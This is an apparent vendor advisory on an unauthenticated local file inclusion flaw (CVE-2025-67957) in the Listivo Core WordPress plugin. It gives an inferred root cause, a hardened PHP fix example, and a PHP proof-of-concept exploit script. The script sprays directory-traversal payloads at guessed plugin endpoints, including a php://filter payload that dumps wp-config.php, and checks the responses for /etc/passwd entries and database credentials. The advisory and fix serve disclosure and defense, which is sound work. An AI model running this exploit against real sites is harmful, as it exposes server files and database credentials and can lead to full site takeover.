Atomic Edge analysis of CVE-2025-67957 (metadata-based):
This vulnerability is an unauthenticated Local File Inclusion (LFI) in the Listivo Core WordPress plugin, affecting versions up to and including 2.3.77. The flaw allows attackers to include arbitrary files from the server’s filesystem, potentially leading to remote code execution. The CVSS score of 8.1 indicates a high-severity risk.
Atomic Edge research infers the root cause is improper validation of user-controlled input used in PHP file inclusion functions like `include()` or `require()`. The CWE-98 classification confirms this pattern. The vulnerability likely exists in a plugin endpoint that accepts a file path parameter without proper sanitization. This conclusion is inferred from the CWE and description, as the source code diff is unavailable for confirmation.
Exploitation likely involves sending a crafted HTTP request to a specific plugin endpoint. Attackers can target AJAX handlers (`admin-ajax.php`) or direct plugin files. A payload would manipulate a parameter, such as `file` or `template`, to traverse directories and include local files like `/etc/passwd` or previously uploaded web shells. The unauthenticated nature suggests missing capability checks on the vulnerable function.
The patch in version 2.3.78 likely implemented strict validation on the user-supplied filename parameter. Proper remediation requires using an allowlist of permitted files, sanitizing input with `sanitize_file_name()`, or removing directory traversal sequences. The fix should also ensure the endpoint verifies user capabilities or a valid nonce.
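The remediation pattern described above, as an added example that is not Listivo Core's code: a WordPress AJAX template loader hardened with an allowlist, a realpath containment check, a nonce and a capability check. The function names, action name, template keys and `templates/` directory are assumptions for illustration.

```php
<?php
// Added example (not the plugin's code). Hypothetical names throughout.

// Allowlist: the only keys the endpoint will ever resolve to a file. The
// user-supplied value is never used as a path component, so no traversal
// sequence or php:// wrapper can reach include().
const LISTIVO_DEMO_TEMPLATES = [
    'listing-card' => 'listing-card.php',
    'listing-grid' => 'listing-grid.php',
];

function listivo_demo_resolve_template( string $key ): ?string {
    if ( ! isset( LISTIVO_DEMO_TEMPLATES[ $key ] ) ) {
        return null; // not on the allowlist
    }
    $base = realpath( __DIR__ . '/templates' );
    $path = realpath( $base . '/' . LISTIVO_DEMO_TEMPLATES[ $key ] );
    // Defense in depth: even an allowlisted entry must resolve inside $base.
    if ( false === $base || false === $path
        || 0 !== strpos( $path, $base . DIRECTORY_SEPARATOR ) ) {
        return null;
    }
    return $path;
}

function listivo_demo_load_template_ajax(): void {
    // Nonce check: dies with 403 unless the request carries a valid nonce.
    check_ajax_referer( 'listivo_demo_load_template', 'nonce' );
    // Capability check: the endpoint is not meant for unauthenticated callers.
    if ( ! current_user_can( 'read' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // sanitize_key() reduces the input to [a-z0-9_-], which is all a key needs.
    $key  = sanitize_key( wp_unslash( $_POST['template'] ?? '' ) );
    $path = listivo_demo_resolve_template( $key );
    if ( null === $path ) {
        wp_send_json_error( 'unknown template', 400 );
    }
    ob_start();
    include $path;
    wp_send_json_success( ob_get_clean() );
}
// Only the authenticated hook is registered; without a wp_ajax_nopriv_ hook,
// logged-out requests to admin-ajax.php never reach this handler.
add_action( 'wp_ajax_listivo_demo_load_template', 'listivo_demo_load_template_ajax' );
```

With this shape `sanitize_file_name()` is unnecessary, because the request value only selects an allowlist entry and never becomes part of the included path.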
Successful exploitation grants attackers the ability to execute arbitrary PHP code on the server. This leads to full system compromise, sensitive data exposure, and complete site takeover. Attackers can bypass access controls, establish persistent backdoors, and pivot to other services on the host network.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-67957 - Listivo Core <= 2.3.77 - Unauthenticated Local File Inclusion
<?php
/**
 * Proof of Concept for CVE-2025-67957.
 * This script attempts to exploit an unauthenticated Local File Inclusion (LFI) vulnerability.
 * The exact endpoint and parameter are inferred from common WordPress plugin patterns.
 * Two common attack vectors are tested: a direct plugin file and an AJAX handler.
 */
$target_url = 'http://target-site.com'; // CHANGE THIS

// Common LFI payloads to test for file inclusion
$payloads = [
    '../../../../../../etc/passwd',
    '..\..\..\..\..\..\windows\win.ini',
    'php://filter/convert.base64-encode/resource=wp-config.php',
];

// Inferred vulnerable endpoints based on plugin slug 'listivo-core'
$endpoints = [
    '/wp-content/plugins/listivo-core/includes/templates/loader.php', // Common direct file pattern
    '/wp-admin/admin-ajax.php', // AJAX handler
];

// Inferred parameter names common in LFI vulnerabilities
$params = ['file', 'template', 'path', 'include', 'load'];

/**
 * Check a response body for indicators of successful file inclusion:
 * an /etc/passwd entry, a win.ini comment, or a base64-encoded wp-config.php.
 */
function looks_like_lfi(string $response): bool
{
    if (strpos($response, 'root:') !== false) {
        return true;
    }
    if (strpos($response, '; for 16-bit app support') !== false) {
        return true;
    }
    $decoded = base64_decode(trim($response));
    return $decoded !== false && strpos($decoded, 'DB_NAME') !== false;
}

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

foreach ($endpoints as $endpoint) {
    foreach ($params as $param) {
        foreach ($payloads as $payload) {
            $url  = $target_url . $endpoint;
            $data = [$param => $payload];

            // Test via POST (common for AJAX)
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
            $response = (string) curl_exec($ch);

            if (looks_like_lfi($response)) {
                echo "[SUCCESS] Potential LFI at: $url\n";
                echo "Parameter: $param\n";
                echo "Payload: $payload\n";
                echo "Response snippet: " . substr($response, 0, 200) . "\n\n";
                exit;
            }

            // Test via GET for direct file endpoints
            if ($endpoint !== '/wp-admin/admin-ajax.php') {
                $url_with_query = $url . '?' . http_build_query($data);
                curl_setopt($ch, CURLOPT_URL, $url_with_query);
                curl_setopt($ch, CURLOPT_POST, false);
                $response = (string) curl_exec($ch);

                if (looks_like_lfi($response)) {
                    echo "[SUCCESS] Potential LFI at: $url_with_query\n";
                    echo "Parameter: $param\n";
                    echo "Payload: $payload\n";
                    echo "Response snippet: " . substr($response, 0, 200) . "\n\n";
                    exit;
                }
            }
        }
    }
}

echo "[INFO] No obvious LFI vulnerability detected with inferred patterns.\n";
curl_close($ch);
?>